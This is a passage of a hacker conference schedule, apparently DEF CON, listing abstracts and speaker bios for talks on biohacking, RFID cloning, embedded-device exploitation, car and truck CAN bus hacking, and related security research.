Dr. Renee Wegrzyn joined DARPA as a Program Manager in 2016. She is interested in applying the tools of synthetic biology to support biosecurity and outpace infectious disease. Prior to joining DARPA as a PM, Dr. Wegrzyn was a Senior Lead Biotechnologist at Booz Allen Hamilton, where she led a team that provided scientific and strategic support in the areas of biodefense, biosecurity, disruptive technologies, emerging infectious disease, neuromodulation, and synthetic biology to DARPA and other federal and private institutions.
About Doug Weber:
Doug Weber is a Program Manager in the Biological Technology Office (BTO) at the Defense Advanced Research Projects Agency (DARPA). He is also an Associate Professor of Bioengineering at the University of Pittsburgh. At DARPA, Dr. Weber is currently managing the Hand Proprioception and Touch Interfaces (HAPTIX) program, aimed at developing human-ready, fully-implantable interface systems that enable trans-radial amputees to control and sense advanced, multi- functional prosthetic limbs. Dr. Weber is also managing the Electrical Prescriptions (ElectRx) program, which seeks to advance the science and technology of neuromodulation treatments for inflammatory disease and mental health disorders.
Abstract:
From programmable microbes to human-machine symbiosis, DARPA’s Biological Technologies Office is expanding the concept of technology and redefining how we interact with and use biology. No longer limited to traditional sensorimotor restoration or therapeutic autonomic modulation, DARPA is developing neurotechnologies that are crossing into applications that stand to overcome current limitations in human performance. Meanwhile, rapid democratization of gene synthesis and editing techniques is bringing engineered biology to the fore on a global scale, and with it a demand for tools that can ensure that any future deployments of these technologies are safe. BTO is addressing the growing need for these and other biosecurity tools to enable aggressive but responsible development and adoption of new biotechnologies—through the design, for example, of such white hat strategies as countermeasures to reduce the risk of unintended consequences and tools to recall genes from open environments. This talk will provide an overview of emerging neuro- and synthetic-biology technologies under development at DARPA, identify strategies for continued responsible development, and reveal relevant possibilities, probabilities, and vulnerabilities.
Return to Index
BHV - Skyview 4 - Sunday - 14:00-14:59
Speaker: Victoria Sutton
About Victoria:
Victoria Sutton, MPA, PhD, JD
Paul Whitfield Horn Professor
Associate Dean for Research and Faculty Development
Director, Center for Biodefense, Law and Public Policy
Director, Science, Engineering and Technology Law Concentration Program
Director, Dual Degree Programs in Science, Engineering and Technology
Founding Editor, Journal for Biosecurity, Biosafety and Biodefense Law
This session will give you some basic tips for avoiding violating the law, and some preventive tips for avoiding potential legal traps if you are a biohacker. Biohacking, in this session, includes body devices, genetic engineering, synthetic biology and laboratory practices. The session will begin with some examples of why you need to know about law for biohackers and discuss legal cases useful for biohackers. The second part of the session will be workshop-style, applying these rules for biohackers.
Return to Index
BHV - Skyview 4 - Friday - 10:05-10:59
Speaker: Tim Cannon
About Tim:
Tim Cannon is an American software developer, entrepreneur, and biohacker based in Pittsburgh, Pennsylvania. He is best known as the co-founder and Chief Information Officer of Grindhouse Wetware, a biotechnology startup company that creates technology to augment human capabilities.
Cannon has spoken at conferences around the world on the topics of human enhancement, futurism, and citizen science, including at TEDx Rosslyn, FITUR, the University of Maryland, the World Business Dialogue, the Medical Entrepreneur Startup Hospital, and others. He has been published in Wired and featured in television shows such as National Geographic Channel’s Taboo and "The Big Picture with Kal Penn". Tim has been featured on podcasts including Ryan O'Shea's Future Grind and Roderick Russell's Remarkably Human.
Abstract:
The talk will focus on biohacking not just as an ethically grey zone, but will instead present the idea that biohacking is not just something we would like to see, but something we must do if we are ever going to be capable of living up to the morals we espouse.
Return to Index
BHV - Skyview 4 - Friday - 11:00-11:59
Speaker: Mr_Br!ml3y
About Mr_Br!ml3y:
Mr_Br!ml3y grew up farming and liked it so much he went into information technology at the first opportunity. He has 6 years full-time infosec experience and strong side interests in biology and chemistry. He is currently working on a PhD in environmental engineering.
Abstract:
Biosafety levels (1 through 4) have been established to provide standardized safety protocols for biological research in professional settings, to protect researchers and the general public. While the new biohacker might only need a reduced set of lab safety standards (here called biosafety level 0), any bio-researcher needs an awareness of biosafety levels as they develop into commercial (level 1) or medical (level 2) research. Biosafety levels 3 and 4 will be discussed for completeness and to impress on the home researcher the difficulty in safely working with virulent pathogens.
Return to Index
BHV - Skyview 4 - Saturday - 15:00-15:59
Speaker: Ed You
About Ed:
Covert FBI super squirrel, loves working with Legos, haikus, and playing handball with cement spheres. Ask him about his time in Panama; Spanish is his third language fluency, followed by sarcasm.
Abstract:
What talk? It's going to be a theatrical song and interpretive dance related to the five Ws and how to fix our bio economy. You get it, I know you do.
Return to Index
Wireless - Skyview 1 - Saturday - 15:00-15:50
tb68r
Bio
tb69rr (@tb69rr) spent 20 years doing offensive and defensive physical security and surveillance for the military. Six years ago it became apparent to him that someone sitting in a basement at a computer could hand him and his team their ass. That was a wake-up call. He was a true knuckle dragger. That is the moment tb69rr decided to make electronic signature and cyber his focus. He began developing techniques for protecting military personnel and civilians from tracking using RF, cellular, and cyber. He has consulted for DARPA, MGM International, General Electric, and various military organizations. RSA has published his blogs on exploiting digital data and travel safety. Now tb69rr's knuckles drag across a keyboard. He has drunk beer from the Arctic Circle to South America.
@tb68r
Tim Quester
Bio
Tim K (@bjt2n3904) is an electronics engineer living in Virginia Beach. He enjoys designing embedded systems and working with radios. Previously, he has taught workshops on Software Defined Radio at conferences like Kiwicon and Cyberspectrum. His favorite programming language is solder.
@bjt2n3904
Blinded by the Light
Abstract
Did you know some of your tablets and smartphones broadcast IR even with the screen off? These signals can be used to spot and identify specific operating systems and, in some cases, specific devices.
This class is designed to help you understand that it's not just RF that can betray who you are and where you've been.
This live demo will expose unintended tracking possibilities created by the current use of infrared (IR) proximity detectors in cellular devices (and other devices). The presentation will show students how smartphones, Android and iPhone, can be identified by the IR patterns they display from a substantial distance. The class will teach techniques to fingerprint these patterns.
Topics:
History:
IR exploits from the past and how to learn from them.
Hardware:
Photodiode vs. LED
Comparators and why we need them
Amplifiers
Improved IR collection techniques with everyday items
Improvised IR filters
Logic analyzer and oscilloscope techniques for reading a signal
Software:
Using an Arduino to evaluate IR in the wild
How to make sense of signals that are not in a library
The audience will also be given directions on how to make their own IR detection device to detect IR in a variety of situations. This tool will allow people to know when their devices are triggering IR responses and to discover if devices around them are using IR. It will also allow them to demodulate and view what type of data is being sent via IR. The class will be encouraged to discover and target their own devices as a proof of concept.
Return to Index
BHV - Skyview 4 - Friday - 16:00-16:59
Speakers: John Bass
About John:
John Bass is the Founder and CEO of Hashed Health, a healthcare technology innovation company focused on accelerating the realization of blockchain and distributed ledger technologies. John has over 20 years of experience in healthcare technology with expertise in collaborative platforms, patient engagement, systems integration, supply chain, clinical performance and value-based payments.
Prior to Hashed Health, John was CEO at InVivoLink, a surgical patient registry and care management start-up, acquired by HCA in 2015. John’s experience also includes healthcare B2B startup empactHealth.com which was acquired by Medibuy / Global Healthcare Exchange. John is a native of Nashville and has a Chemistry degree from the University of North Carolina, Chapel Hill.
Abstract:
Over the next ten years, blockchain and distributed ledger technologies will fundamentally change the delivery of care around the globe. The blockchain provides a technical framework where trust is moved from central controlling intermediaries to the open source protocol, freeing data and assets from the control of traditional corporate interests. The great hope is that this evolution will result in the empowerment of consumers, communities, and markets centered on sustainable wellness and environments of health. The coming years represent a unique opportunity to make sure blockchain-based global health initiatives are structured in a way that re-constructs our broken system in a way that improves the lives of individuals and the communities in which they live.
Return to Index
DEFCON - Track Two - Friday - 12:00-12:59
Blockfighting with a Hooker -- BlockFighter2!
K2 Director, IOACTIVE
What's your style of hooking? My hooking Style? It's like hooking without hookers.
The use cases for hooking code execution are abundant and this topic is very expansive. EhTracing (pronounced ATracing) is a technique that allows monitoring/altering of code execution at a high rate with several distinct advantages.
- Full-context (registers, stack & system state) hooking can be logged without needing to know a function prototype, and changes to execution flow can be made as desired.
- Traditional detour-style hooking requires a length-disassembly engine and then direct binary .text segment modifications to insert the intended hook (no changes to the binary are needed with EhTrace).
- Block/branch stepping enables a simplification of analysis code (it does not need to do a full procedure/function graph recognition/traversal). This will focus on the use of VEH and the DR7 backdoor in x64 Windows.
In a nutshell, EhTrace enables very good performance, in-proc debugging and a dead simple ROP hook primitive. Some neat graphics and visualizations will be made of some of the early examples, which are up at https://github.com/K2/EhTrace
This novel implementation for hookers establishes a model for small purpose built block-fighting primitives to be used in order to analyze & do battle, code vs. code.
As a special bonus "round 3 FIGHT!" we will see a hypervisor DoS that will cause a total lockup for most hypervisors (100%+ utilization per CORE). This goes to show that emulating or even adapting a hypervisor to a full CPU feature set is exceedingly hard and it’s unlikely that a sandbox/hypervisor/emulator will be a comprehensive solution to evade detection from adversarial code for some time.
Let’s have some fun blockfighting with some loose boxed hookers!
K2 likes to poke around at security cyber stuff, writing tools and exploits to get an understanding of what’s easy, hard and fun/profit! He’s written and contributed to books, papers and spent time at security conferences over the years.
K2 currently works with IOActive and enjoys a diverse and challenging role analyzing some of the most complex software systems around.
ktwo
Twitter @IOACTIVE
github.com/K2
github.com/ShaneK2
Return to Index
Demolabs - Table 3 - Saturday - 12:00-13:50
Boscloner - All in One RFID Cloning Toolkit
Phillip Bosco
The Boscloner is an All in One RFID Cloning Toolkit designed to make RFID badge cloning during a penetration testing engagement trivial, accessible, and lightning fast. The Boscloner’s core functionality set revolves around its ability to capture RFID badges from three feet away, automatically clone the captured badge (in seconds!), and allow the penetration tester to reach into a pocket and pull out a cloned and fully functioning badge providing instantaneous access to a restricted area. Access granted!
With its open source nature, high accessibility, and focus on furthering the security industry through community collaboration, the Boscloner has become the new golden standard for RFID penetration testing engagements.
Phillip Bosco possesses over 10 years of experience in information security via both commercial and government positions. While currently employed as a Senior Security Consultant for Rapid7, Phillip's previous employment includes the United States Marine Corps as a Cyber Marine and CSC as a penetration tester. Phillip is active in research, focusing primarily on social engineering and physical security. During his research into home security systems, he discovered a flaw that allows malicious individuals to break into a house without triggering an alarm, and the attack works against multiple vendors. His discovery has captured the media's attention in such publications as Wired Magazine, Washington Times, NetworkWorld, Ars Technica, ZDNet, CSO Online, InfoSecurity Magazine, The Verge, and more. Phillip is scheduled to complete his Master's Degree in Information Security Engineering from SANS Institute by the Fall of 2016. Phillip holds the following information security credentials:
OSCP, OSWP, CISSP, GSEC (Gold), GCIA (Gold), GPEN, GWAPT, GCIH, CEH, ECSA, CNDA, A+, Network+, Security+
Return to Index
Workshops - Las Vegas Ballroom 3 - Saturday - 10:00-14:00
Brainwashing Embedded Systems
Craig Young Security Researcher, Tripwire
Learning the secret incantations to make embedded systems carry out your will is not as hard as one might think. In the world of IoT, the hardened system is rare and most times a firmware image is more than enough to find and exploit weakness. This session explains in detail a process for going from zero-knowledge to zero-day on real-world devices without breaking a sweat. Attendees to this tutorial session will learn the ropes of firmware dissection, app decompilation, and manual fuzz testing in a hands-on hack lab. Participants will be provided with a customized Kali Linux virtual appliance and given access to several consumer devices for analysis. These techniques have been successfully employed by the author to identify over 100 CVEs on embedded/IoT devices as well as to win the 0-day and CTF tracks in the DEF CON 22 SOHOpelessly Broken router hacking competition.
Craig Young is a computer security researcher with Tripwire's Vulnerability and Exposures Research Team (VERT). He has identified and responsibly disclosed dozens of vulnerabilities in products from Google, Amazon, IBM, NETGEAR, Adobe, HP, Apple, and others. His research has resulted in numerous CVE assignments and repeated recognition in the Google Application Security Hall of Fame. Craig's presentations on Google authentication weaknesses have led to considerable security improvements for all Google users. Craig won in track 0 and track 1 of the first ever SOHOpelessly Broken contest at DEF CON 22 by demonstrating 10 0-day flaws in SOHO wireless routers. His research into iOS WiFi problems more recently exposed CVE-2015-3728 that could allow devices to inadvertently connect to malicious hot spots. Craig has more recently turned his attention to a different part of the wireless spectrum with research into home automation products as well as RFID/NFC technology.
Max Class Size: 55
Prerequisites for students: Basic *nix knowledge; comfort with a shell; understanding of HTTP
Materials or Equipment students will need to bring to participate: Nothing is required, but in order to make the most out of the workshop, students will want to have a laptop with an 802.11 adapter and virtualization software capable of running an x86_64 virtual machine from an OVA/OVF (e.g. VirtualBox or VMWare). Virtual machine files will be made available on USB, so an open USB port is preferred.
Return to Index
CPV - Bronze 2 - Saturday - 13:30-15:00
Talk Title:
Breaking Bad Crypto: BB'06 [WORKSHOP]
Speaker Name, Employer or position:
Filippo Valsorda
Abstract:
Learn cryptography, or at least why you should stay away from it, the fun way! By breaking some yourself, live. After doing hash extension and CBC padding oracles the past years, today we'll implement one of the evergreens of crypto attacks: the Bleichenbacher '06 e=3 RSA signature forgery.
Bleichenbacher '06 is a common attack against RSA that allows an attacker to fake a signature. It broke Firefox, then GnuTLS, then again Firefox (BERserk), then python-rsa... And who knows next. You'll learn how it works, how to mount it, and then attack real world implementations with your own code.
The session is 100% hands-on, with very little material (basically just docs, a target server implementation, and some client boilerplate). I'll explain the crypto and attack basics and then proceed to code the exploit live, along with the audience, stopping often to analyze and compare outputs and milestones.
No slides, just cold hard code and data produced along the way.
No cryptography experience needed at all. Bring your laptop and Python chops.
Bio:
Filippo Valsorda (@FiloSottile) is a systems and cryptography engineer at CloudFlare, where he kicked DNSSEC until it became something deployable. Nevertheless, he's probably best known for making popular online vulnerability tests, including the original Heartbleed test. He's really supposed to implement cryptosystems, not break them, but you know how it is.
Social media links if provided:
@FiloSottile
Return to Index
SkyTalks - Skyview 3 - Friday - 15:00-15:59
Speakers: Nir Valtman, Patrick Watson
Talk: Breaking Payment Points of Interaction
The payment industry is becoming more driven by security standards. However, the cornerstones are still broken even with the latest implementations of these payment systems, mainly due to focusing on the standards rather than security. The best example of that is the ability to bypass protections put in place by points of interaction (POI) devices by simply modifying several files on the point of sale or manipulating the communication protocols. In this presentation, we will explain the main flaws and provide live demonstrations of several weaknesses on a widely used pinpad. We will not exploit the operating system of the pinpad, but actually bypass the application layer and the business logic protections, i.e. the crypto algorithm is secure, but everything around it is broken. As part of our demos, we will include EMV bypassing, avoiding PIN protections and scraping PANs from various channels.
Return to Index
DEFCON - Track Three - Friday - 16:00-16:59
Breaking the Internet of Vibrating Things : What We Learned Reverse Engineering Bluetooth- and Internet-Enabled Adult Toys
follower Hacker
goldfisk Hacker
The Internet of Things is filled with vulnerabilities, would you expect the Internet of Vibrating Things to be any different? As teledildonics come into the mainstream, human sexual pleasure has become connected with the concerns of privacy and security already familiar to those who previously only wanted to turn on their lights, rather than their lover. Do you care if someone else knows if you or your lover is wearing a remote control vibrator? Do you care if the manufacturer is tracking your activity, sexual health and to whom you give control? How do you really know who is making you squirm with pleasure? And what happens when your government decides your sex toy is an aid to political dissidents? Because there’s nothing more sexy than reverse engineering we looked into one product (the We-Vibe 4 Plus from the innocuously named "Standard Innovation Corporation") to get answers for you.
Attend our talk to learn the unexpected political and legal implications of internet connected sex toys and, perhaps more importantly, how you can explore and gain more control over the intimate devices in your life. Learn the reverse engineering approach we took--suitable for both first timers and the more experienced--to analyze a product that integrates a Bluetooth LE/Smart wireless hardware device, mobile app and server-side functionality. More parts means more attack surfaces! Alongside the talk, we are releasing the "Weevil" suite of tools to enable you to simulate and control We-Vibe compatible vibrators. We invite you to bring your knowledge of mobile app exploits, wireless communication hijacking (you already hacked your electronic skateboard last year, right?) and back-end server vulnerabilities to the party. It’s time for you to get to play with your toys more privately and creatively than before.
Please note: This talk contains content related to human sexuality but does not contain sexually explicit material. The presenters endorse the DEF CON Code of Conduct and human decency in relation to matters of consent--attendees are welcome in the audience if they do the same. Keep the good vibes. :)
follower talks with computers and humans. Six years after first speaking at DEF CON about vulnerabilities in the Internet of Things, the fad hasn’t blown over, so he is back doing it again. An interest in code and hardware has led to Arduino networking and USB projects and teaching others how to get started with Arduino. Tim O'Reilly once called follower a ‘troublemaker’ for his Google Maps reverse engineering.
Twitter: @rancidbacon
goldfisk spins fire by night and catches up with computer science lectures, also by night. And wishes headphone cables would stop getting caught on stuff. An interest in reverse engineering can be blamed on a childhood playing with electronics and re-implementing browser games in Scratch.
Twitter: @g0ldfisk
Return to Index
DEFCON - DEF CON 101 - Friday - 10:00-10:59
BSODomizer HD: A Mischievous FPGA and HDMI Platform for the (M)asses
Joe Grand (Kingpin) Grand Idea Studio
Zoz Hacker
At DEF CON 16 in 2008, we released the original BSODomizer (www.bsodomizer.com), an open source VGA pranking tool and introductory hacking platform for the multicore Propeller micro-controller. Hours of productivity were replaced with rage and frustration as unwitting computer users were confronted with fake Blue Screens of Death and revolting ASCII art. But, the world has changed. The machines have risen in capability. HDMI is the graphical transmission protocol of choice and hacking with micro-controllers is standard issue. The as-seen-on-HDTV duo of Joe Grand and Zoz return with the next generation of mischievous hardware, a device that supplants or captures any inline HDMI signal in a discreet, pentest-worthy package. BSODomizer HD is an FPGA-based system that not only improves on the graphics interception and triggering features of its predecessor, but can now capture screenshots of a target system and also provides a fully open design that you can use for your own experiments into the mystical world of massive, customizable arrays of digital logic. We'll guide you through the process of going from lamer zero to hacker hero with FPGAs, while savagely fucking with a few unfortunate friends along the way!
Joe Grand, also known as Kingpin, is a computer engineer, hardware hacker, former DEF CON badge designer, runner, daddy, honorary doctor, TV host, member of L0pht Heavy Industries, and the proprietor of Grand Idea Studio.
Twitter: @joegrand
Zoz is a robotics engineer, prankster, and renaissance hacker. Other than BSODs, things he enjoys faking include meteorite impacts, crop circles, and alien crash landings.
Return to Index
IOT - Bronze 1 - Friday - 15:00-15:50
BtleJuice: the Bluetooth Smart Man In The Middle Framework
Damien Cauquil, Digital Security (CERT-UBIK), Senior Security Researcher
The BtleJuice framework provides all the features needed to perform Man-in-the-middle attacks on devices using Bluetooth Low Energy (also known as Bluetooth Smart) and requires neither expensive hardware nor an SDR device. This talk will discuss most of its features and how to use it to assess the security of smart devices and find vulnerabilities, including live demos. The framework source code will be released just before the talk.
Damien Cauquil is a senior security researcher at Digital Security (CERT-UBIK), a French security company focused on IoT and related ground-breaking technologies. He has spoken at various international security conferences including Chaos Communication Camp, Hack.lu, Hack In Paris and a dozen times at the Nuit du Hack (one of the oldest French security conferences).
@virtualabs
Return to Index
WOS - Skyview 6 - Sunday - 11:10-11:59
Building a Local Passive DNS Tool for Threat Intelligence Research
Kathy Wang, Security Strategist and Researcher at Splunk, Inc.
Currently, many Security Operations capabilities struggle with obtaining useful passive DNS data post breach. Breaches are often detected months after the attack. Due to the ephemeral nature of malicious DNS domains, existing well-known passive DNS collections lack complete visibility to aid in conducting incident response and malware forensics. We will present a new tool to collect local passive DNS data, which will enable security operations capabilities to conduct more effective defense against malware, including APTs, zero days, and targeted attacks. Our presentation will consist of a demo of the tool, and the tool will be released for public use.
Kathy Wang (Twitter: @wangkathy) is an internationally-recognized malware expert, who has researched, developed, evaluated, and operationalized various solutions for detecting and preventing client-side attacks used by advanced persistent threats (APT), as they target common platforms (e.g., browser, email, mobile phones). Prior to Splunk, Kathy has held past positions such as Director of Research and Development at ManTech International, and Principal Investigator of the Honeyclient Project at The MITRE Corporation, during which she pioneered a prototype that became the basis of current cutting-edge zero-day malware detection technologies. Kathy has spoken at many security conferences and panels internationally, including RSA, DEF CON, AusCERT, and REcon. She has co-authored a book, Beautiful Security, and holds a BS and MS in Electrical Engineering from The University of Michigan, Ann Arbor.
Return to Index
HHV - Contest Area - Friday - 12:00-12:59
Building malicious hardware out of analog circuits
Matthew Hicks
Can you trust your chipset? What if a fabrication-time attacker could slightly modify a processor circuit design to include a weaponizable modification? One that normal testing is not likely to detect and that eludes activation by a diverse set of benchmarks? Matthew Hicks and his research partners have done this with the addition of a small analog circuit to an open source processor; it is the first openly malicious processor. Come hear about the details.
Return to Index
Demolabs - Table 1 - Saturday - 16:00-17:50
BurpSmartBuster
Patrick Mathieu
Bruteforcing non-indexed data is often used to discover hidden files and directories, which can lead to information disclosure or even a system compromise when a backup file is found. This bruteforce technique is still useful today, but the tools lack application context and don't use any smart behaviour to reduce the bruteforce scanning time or to be stealthier. BurpSmartBuster, a Burp Suite plugin, offers to use the application context and add the smart into the Buster!
This presentation will reveal this new open-source plugin and will show practical cases of how you can use this new tool to accelerate your Web pentest and find hidden treasures! The following will be covered:
- How to add context to a web bruteforce tool
- How we can be stealthier
- How to limit the number of requests: Focus only on what is the most critical
- Show how simple the code is and how you can help to make it even better
Patrick Mathieu is cofounder of Hackfest.ca, the largest security event in Eastern Canada. He has worked in computer security for more than 10 years and has been involved in the hacking community around Quebec, Canada for more than 20 years, starting when he found texts about hacking on the last online BBSs. He is currently employed as a Senior Security Consultant, where he specialises in application security for both offence and defence and is currently assigned to multiple webapp pentests and trainings. Patrick holds a Bachelor's degree and a College degree in computer science.
Return to Index
DEFCON - Track One - Saturday - 12:00-12:59
Bypassing Captive Portals and Limited Networks
Grant Bugher Perimeter Grid
Common hotspot software like Chilispot and Sputnik allows anyone to set up a restricted WiFi router or Ethernet network with a captive portal, asking for money, advertising, or personal information in exchange for access to the Internet. In this talk I take a look at how these and similar restrictive networks work, how they identify and restrict users, and how, with a little preparation, we can reach the Internet regardless of what barriers they throw up.
Grant Bugher has been hacking and coding since the early 90's and working professionally in information security for the last 12 years. He is currently a security engineer for a cloud service provider, and has previously been an architect, program manager and software engineer on a variety of online services, developer tools and platforms. Grant is a prior speaker at BlackHat and DEF CON and a regular DEF CON attendee since DEF CON 16. Most of his research and work is on cloud computing and storage platforms, application security, and detecting & investigating attacks against web-scale applications.
Twitter: @fishsupreme
perimetergrid.com
Return to Index
Workshops - Las Vegas Ballroom 1 - Thursday - 15:00-19:00
C/C++ Boot Camp for Hackers
Eijah Founder, demonsaw
The C/C++ programming language is one of the most important programming languages ever created. Ever since Dennis Ritchie invented the language and Bjarne Stroustrup added object-oriented capabilities to it, C/C++ has been the standard by which all other languages are judged. C/C++ is considered the lingua franca of UNIX, Linux, BSD, and Windows as well as many software toolsets including GNU, Aircrack-ng, and the GCC compiler. And not only that, but C/C++ has influenced many other languages including C#, Java, Perl, PHP, and Python.
As hackers, we sometimes have to write code. And while there are more modern and higher-level languages available, C/C++ still plays a strong and prominent role in the hacking world due to its close ties to Linux and BSD. Whether we're writing shell scripts, python programs, PHP websites, contributing to a FOSS project, reverse engineering a binary, or rebuilding/patching the OS kernel; having a familiarity with C/C++ gives us a tremendous advantage and adds a powerful tool to our hacker arsenal.
This workshop is a C/C++ boot camp for hackers. It's an intense hands-on experience designed to get you up-to-speed with the most important parts of the C/C++ programming language using the GCC/G++ compiler. You'll learn about variables, functions, pointers, operators, classes, libraries, threads, templates, data structures, algorithms, exception handling, memory management, and design patterns. Whether you're a professional programmer, find yourself a little rusty and simply want a refresher course, or even if you'd never programmed in C/C++ before; this workshop is for you.
Please note that this is an intermediate-level, technical workshop and requires that attendees have prior experience in at least one programming language. Bring your laptop, a USB flash drive, and your favorite C/C++ 11 compiler (>= gcc/g++ 4.7 or msvc 2013).
Eijah is the founder of demonsaw, a secure and anonymous information sharing program. For the last 5 years he was also a Senior Programmer at Rockstar Games where he worked on Grand Theft Auto V for PS3, Xbox 360, PS4, Xbox One, and PC. Eijah has over 15 years of software development and IT Security experience. His career has covered a broad range of Internet and mid-range technologies, core security, and system architecture. Eijah has been a faculty member at multiple colleges, has spoken about security and development at DEF CON and Hack Miami conferences, and holds a master’s degree in Computer Science. Eijah is an active member of the hacking community and is an avid proponent of Internet freedom.
Max Class Size: 55
Prerequisites for students: Previous experience in at least one programming language is required, although it doesn't have to be in C/C++.
Materials or Equipment students will need to bring to participate: Laptop with Windows, Linux, or OSX. USB flash drive for saving their progress.
Return to Index
DEFCON - Track Three - Friday - 12:00-12:59
CAN i haz car secret plz?
Javier Vazquez Vidal Hardware Security Specialist at Code White GmbH
Ferdinand Noelscher Information Security Specialist at Code White GmbH
The CAN bus is really mainstream, and every now and then new tools come out to deal with it. Everyone wants to control vehicles and already knows that you can make the horn honk by replaying that frame you captured. But is this all that there is on this topic? Reversing OEM and third party tools, capturing firmware update files on the fly, and hijacking Security Sessions on a bus are just a few examples of things that can be done as well. For this and more, we will introduce to you the CanBadger! It's not just a logger, nor just an injector. It's a reversing tool for vehicles that allows you to interact in real time with individual components, scan a bus using several protocols (yup, UDS is not the only one) and perform a series of tests that no other tool offers. The CanBadger is where the real fun begins when dealing with a vehicle, and you can build it for under $60 USD! If you are already done with replaying frames on the CAN bus and want to learn how that fancy chip-tuning tool deals with your car, or simply want to get Security Access to your vehicle without caring about the security key or algorithm, we are waiting for you!
Javier Vazquez Vidal is passionate about technology and specializes in hardware and embedded systems security. He studied Electromechanics and Telecommunications, developing a passion for electronics and technology since his youth. He has been part of several projects that involved well-known hardware, but his first public work was presented at DEF CON 21, the ECU tool. He developed the CHT, a tool to take over the CAN network, and had some fun with the ‘paella country’ smart meters. He is currently working as a Product Security Engineer at Code White GmbH, and has worked at companies such as Tesla, Daimler, Airbus Military and Visteon.
Ferdinand Noelscher is an information security researcher from Germany. He has been working in Information Security for several years now. Ferdinand is very passionate about Offensive Security research and has been working on numerous embedded security projects, and some lasers too. Furthermore, he gave a training together with Javier at hardwear.io. He is currently a Security Researcher at Code White.
Return to Index
DEFCON - Track One - Sunday - 13:00-13:59
Can You Trust Autonomous Vehicles: Contactless Attacks against Sensors of Self-driving Vehicle
Jianhao Liu Director of ADLAB, Qihoo 360
Chen Yan PhD student, Zhejiang University
Wenyuan Xu Professor, Electrical Engineering, Zhejiang University
To improve road safety and driving experiences, autonomous vehicles have emerged recently; they can sense their surroundings and navigate without human input. Although promising and offering safety features, the trustworthiness of these cars has to be examined before they can be widely adopted on the road. Unlike traditional network security, autonomous vehicles rely heavily on their ability to sense their surroundings to make driving decisions, which opens a new security risk. Thus, in this talk we examine the security of the sensors of autonomous vehicles, and investigate the trustworthiness of the 'eyes' of the cars. In particular, we investigate sensors whose measurements are used to guide driving, i.e., millimeter-wave radars, ultrasonic sensors, and forward-looking cameras. We present contactless attacks on these sensors and show our results collected both in the lab and outdoors on a Tesla Model S automobile. We show that using off-the-shelf hardware, we are able to perform jamming and spoofing attacks, which caused the Tesla's blindness and malfunction, all of which could potentially lead to crashes and greatly impair the safety of self-driving cars. To alleviate the issues, at the end of the talk we propose software and hardware countermeasures that will improve sensor resilience against these attacks.
Jianhao Liu is the director of ADLAB at Qihoo 360. He specializes in the security of Internet of Things and Internet of Vehicles. He has reported a security vulnerability of Tesla Model S, led a security research on the remote control of a BYD car, and participated in the drafting of security standards among the automobile society. Being a security expert employed by various information security organizations and companies, he is well experienced in security service, security evaluation, and penetration test.
Chen Yan is a PhD student at Zhejiang University in the Ubiquitous System Security Laboratory. His research focuses on the security and privacy of wireless communication and embedded systems, including automobile, analog sensors, and IoT devices.
Wenyuan Xu is a professor in the College of Electrical Engineering at Zhejiang University and an associate professor in the Department of Computer Science and Engineering at the University of South Carolina. She received her Ph.D. degree in Electrical and Computer Engineering from Rutgers University in 2007. Her research interests include wireless security, network security, and IoT security. She is among the first to discover vulnerabilities of tire pressure monitoring systems in modern automobiles and automatic meter reading systems. Dr. Xu received the NSF CAREER Award in 2009. She has served on the technical program committees for several IEEE/ACM conferences on wireless networking and security, and she is an associate editor of EURASIP Journal on Information Security.
Return to Index
DEFCON - Track Three - Saturday - 12:00-12:59
CANSPY: a Framework for Auditing CAN Devices
Jonathan-Christofer Demay Airbus Defence and Space
Arnaud Lebrun Airbus Defence and Space
In the past few years, several tools have been released allowing hobbyists to connect to CAN buses found in cars. This is welcome, as the CAN protocol is becoming the backbone for embedded computers found in smart cars. Its use is now even spreading outside the car through the OBD-II connector: usage-based policies from insurance companies, air-pollution control from law enforcement or engine diagnostics from smartphones, for instance. Nonetheless, these tools will do no more than what professional tools from automobile manufacturers can do. In fact, they will do less, as they do not have knowledge of upper-layer protocols. Security auditors are used to dealing with this kind of situation: they reverse-engineer protocols before implementing them on top of their tool of choice. However, to be efficient at this, they need more than just being able to listen to or interact with what they are auditing. Precisely, they need to be able to intercept communications and block them, forward them or modify them on the fly. This is why, for example, a framework such as Burp Suite is popular when it comes to auditing web applications. In this paper, we present CANSPY, a framework giving security auditors such capabilities when auditing CAN devices. Not only can it block, forward or modify CAN frames on the fly, it can do so autonomously with a set of rules or interactively using Ethernet and a packet manipulation framework such as Scapy.
It is also worth noting that it was designed to be cheap and easy to build as it is mostly made of inexpensive COTS. Last but not least, we demonstrate its versatility by turning around a security issue usually considered when it comes to cars: instead of auditing an electronic control unit (ECU) through the OBD-II connector, we are going to partially emulate ECUs in order to audit a device that connects to this very connector.
Jonathan-Christofer Demay, PhD is the current penetration testing team leader at AIRBUS Defence and Space. As a former academic researcher, he has been working on IDS bypassing, intrusion detection and general network security. Now a consultant for various key industries and government bodies, he is working on incident response, penetration testing and social engineering.
Arnaud Lebrun is a command and control engineer currently working at AIRBUS Defence and Space. He is focusing on security issues for several projects in the aerospace industry and related areas such as radioactive waste disposal facilities or large telescopes. He also supports the penetration testing team for perimeters that include ICS infrastructures or embedded electronics.
Return to Index
Workshops - Las Vegas Ballroom 2 - Friday - 10:00-14:00
Car Hacking Workshop
Robert Leale President, CanBusHack
KC Johnson Security Researcher
An introduction to connecting to vehicle networks. In the workshop we'll connect and send data to vehicle simulators and use scripts to fuzz messages. We will learn about vehicle systems and how they are connected.
Robert Leale is the President of CanBusHack a company specializing in vehicle network reverse engineering. He currently runs the DEF CON Car Hacking Village and is the trainer for Black Hat's Car Hacking Hands-On.
Hey, KC Johnson is really good at car hacking, no really! I saw him hack a car so that its blinkers turned on. True Story. He can also connect things to cars, like, really fast. Also, he is like totally good at volleyball. OMG.
Max Class Size: 50
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: A laptop with Windows
Return to Index
DEFCON - Track Three - Friday - 12:30-12:59
Cheap Tools for Hacking Heavy Trucks
Six_Volts Research Mercenary
Haystack Vehicle Data Ninja
There has been much buzz about car hacking, but what about the larger heavy-duty brother, the big rig? Heavy trucks are increasingly networked, connected and susceptible to attack. Networks inside trucks frequently use Internet connected devices even on safety-critical networks where access to brakes and engine control is possible. Unfortunately, tools for doing analysis on heavy trucks are expensive and proprietary. Six_Volts and Haystack have put together a set of tools that include open hardware and software to make analyzing these beasts easier and more affordable.
